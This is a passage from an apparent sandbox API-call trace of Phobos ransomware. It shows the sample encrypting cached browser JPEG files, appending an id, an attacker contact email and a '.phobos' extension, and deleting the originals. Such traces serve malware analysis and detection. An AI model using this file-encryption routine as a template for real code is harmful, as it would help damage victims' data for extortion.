hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32c68) returned 1 [0181.906] CryptSetKeyParam (hKey=0xa32c68, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0181.906] CryptEncrypt (in: hKey=0xa32c68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0181.906] CryptDestroyKey (hKey=0xa32c68) returned 1 [0181.906] WriteFile (in: hFile=0x194, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0181.906] CryptDestroyKey (hKey=0xa32de8) returned 1 [0181.906] CloseHandle (hObject=0xb8) returned 1 [0181.906] CloseHandle (hObject=0x194) returned 1 [0181.906] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBBYEW1[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbbyew1[1].jpg")) returned 1 [0181.907] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0181.907] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBBZ20W[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbbz20w[1].jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0181.908] GetFileSizeEx (in: hFile=0x194, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=11425) returned 1 [0181.908] CloseHandle (hObject=0x194) returned 1 [0181.908] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBBZ20W[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbbz20w[1].jpg")) returned 0x2020 [0181.908] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBBZ20W[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbbz20w[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0181.908] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBBZ20W[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbbz20w[1].jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0181.908] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0181.908] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0181.908] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBBZ20W[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbbz20w[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb8 [0181.909] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32de8) returned 1 [0181.909] CryptSetKeyParam (hKey=0xa32de8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0181.909] ReadFile (in: hFile=0x194, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x2ca1, lpOverlapped=0x0) returned 1 [0181.969] CryptEncrypt (in: hKey=0xa32de8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x2cb0, dwBufLen=0x2cb0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x2cb0) returned 1 [0181.969] WriteFile (in: hFile=0xb8, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x2cb0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x2cb0, lpOverlapped=0x0) returned 1 [0181.970] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32ae8) returned 1 [0181.970] CryptSetKeyParam (hKey=0xa32ae8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0181.970] CryptEncrypt (in: hKey=0xa32ae8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0181.970] CryptDestroyKey (hKey=0xa32ae8) returned 1 [0181.971] WriteFile (in: hFile=0xb8, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0181.971] CryptDestroyKey (hKey=0xa32de8) returned 1 [0181.971] CloseHandle (hObject=0x194) returned 1 [0181.971] CloseHandle (hObject=0xb8) returned 1 [0181.971] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBBZ20W[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbbz20w[1].jpg")) returned 1 [0181.972] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0181.972] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBBzaxY[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbbzaxy[1].jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb8 [0181.973] GetFileSizeEx (in: hFile=0xb8, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=7991) returned 1 [0181.973] CloseHandle (hObject=0xb8) returned 1 [0181.973] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBBzaxY[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbbzaxy[1].jpg")) returned 0x2020 [0181.973] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBBzaxY[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbbzaxy[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0181.973] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBBzaxY[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbbzaxy[1].jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb8 [0181.973] SetFilePointerEx (in: hFile=0xb8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0181.973] SetFilePointerEx (in: hFile=0xb8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0181.973] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBBzaxY[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbbzaxy[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0181.973] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32de8) returned 1 [0181.974] CryptSetKeyParam (hKey=0xa32de8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0181.974] ReadFile (in: hFile=0xb8, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x1f37, lpOverlapped=0x0) returned 1 [0182.038] CryptEncrypt (in: hKey=0xa32de8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x1f40, dwBufLen=0x1f40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x1f40) returned 1 [0182.038] WriteFile (in: hFile=0x194, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x1f40, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x1f40, lpOverlapped=0x0) returned 1 [0182.039] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32ca8) returned 1 [0182.039] CryptSetKeyParam (hKey=0xa32ca8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0182.039] CryptEncrypt (in: hKey=0xa32ca8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0182.039] CryptDestroyKey (hKey=0xa32ca8) returned 1 [0182.039] WriteFile (in: hFile=0x194, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0182.040] CryptDestroyKey (hKey=0xa32de8) returned 1 [0182.040] CloseHandle (hObject=0xb8) returned 1 [0182.040] CloseHandle (hObject=0x194) returned 1 [0182.040] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBBzaxY[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbbzaxy[1].jpg")) returned 1 [0182.041] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0182.041] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBC03B1[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbc03b1[1].jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0182.041] GetFileSizeEx (in: hFile=0x194, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=14090) returned 1 [0182.041] CloseHandle (hObject=0x194) returned 1 [0182.041] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBC03B1[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbc03b1[1].jpg")) returned 0x2020 [0182.041] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBC03B1[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbc03b1[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0182.041] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBC03B1[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbc03b1[1].jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0182.042] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0182.042] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0182.042] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBC03B1[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbc03b1[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb8 [0182.042] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32de8) returned 1 [0182.042] CryptSetKeyParam (hKey=0xa32de8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0182.042] ReadFile (in: hFile=0x194, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x370a, lpOverlapped=0x0) returned 1 [0182.097] CryptEncrypt (in: hKey=0xa32de8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x3710, dwBufLen=0x3710 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x3710) returned 1 [0182.097] WriteFile (in: hFile=0xb8, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x3710, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x3710, lpOverlapped=0x0) returned 1 [0182.098] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32ca8) returned 1 [0182.098] CryptSetKeyParam (hKey=0xa32ca8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0182.098] CryptEncrypt (in: hKey=0xa32ca8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0182.098] CryptDestroyKey (hKey=0xa32ca8) returned 1 [0182.098] WriteFile (in: hFile=0xb8, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0182.098] CryptDestroyKey (hKey=0xa32de8) returned 1 [0182.098] CloseHandle (hObject=0x194) returned 1 [0182.098] CloseHandle (hObject=0xb8) returned 1 [0182.098] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBC03B1[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbc03b1[1].jpg")) returned 1 [0182.099] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0182.099] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBC06ZQ[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbc06zq[1].jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb8 [0182.101] GetFileSizeEx (in: hFile=0xb8, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=8246) returned 1 [0182.101] CloseHandle (hObject=0xb8) returned 1 [0182.101] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBC06ZQ[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbc06zq[1].jpg")) returned 0x2020 [0182.101] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBC06ZQ[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbc06zq[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0182.101] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBC06ZQ[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbc06zq[1].jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb8 [0182.101] SetFilePointerEx (in: hFile=0xb8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0182.101] SetFilePointerEx (in: hFile=0xb8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0182.101] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBC06ZQ[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbc06zq[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0182.101] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32de8) returned 1 [0182.101] CryptSetKeyParam (hKey=0xa32de8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0182.102] ReadFile (in: hFile=0xb8, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x2036, lpOverlapped=0x0) returned 1 [0182.103] CryptEncrypt (in: hKey=0xa32de8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x2040, dwBufLen=0x2040 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x2040) returned 1 [0182.103] WriteFile (in: hFile=0x194, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x2040, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x2040, lpOverlapped=0x0) returned 1 [0182.104] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32ca8) returned 1 [0182.104] CryptSetKeyParam (hKey=0xa32ca8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0182.104] CryptEncrypt (in: hKey=0xa32ca8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0182.104] CryptDestroyKey (hKey=0xa32ca8) returned 1 [0182.104] WriteFile (in: hFile=0x194, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0182.104] CryptDestroyKey (hKey=0xa32de8) returned 1 [0182.104] CloseHandle (hObject=0xb8) returned 1 [0182.104] CloseHandle (hObject=0x194) returned 1 [0182.104] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBC06ZQ[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbc06zq[1].jpg")) returned 1 [0182.105] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0182.105] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBC0ALC[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbc0alc[1].jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0182.105] GetFileSizeEx (in: hFile=0x194, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=5117) returned 1 [0182.105] CloseHandle (hObject=0x194) returned 1 [0182.105] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBC0ALC[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbc0alc[1].jpg")) returned 0x2020 [0182.106] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBC0ALC[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbc0alc[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0182.106] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet 